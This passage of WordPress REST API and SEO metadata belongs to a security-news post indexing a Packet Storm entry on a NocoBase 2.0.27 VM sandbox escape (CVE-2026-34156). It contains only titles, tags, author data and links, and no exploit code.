redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=52569","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576 - zero redgem","og_description":"{“lastseen”:”2026-05-08T18:05:07″,”description”:”NocoBase versions 2.0.27 and below VM sandbox escape exploit…”,”published”:”2026-05-08T00:00:00″,”modified”:”2026-05-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape”,”source”:””,”references”:””,”id”:”PACKETSTORM:220576″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-34156″],”sourceData”:”# Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape n # Date:...","og_url":"https:\/\/zero.redgem.net\/?p=52569","og_site_name":"zero redgem","article_published_time":"2026-05-08T13:40:38+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=52569#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=52569"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576","datePublished":"2026-05-08T13:40:38+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=52569"},"wordCount":2378,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.9","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=52569#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=52569","url":"https:\/\/zero.redgem.net\/?p=52569","name":"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-08T13:40:38+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=52569#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=52569"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=52569#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/52569","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=52569"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/52569\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=52569"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=52569"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=52569"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}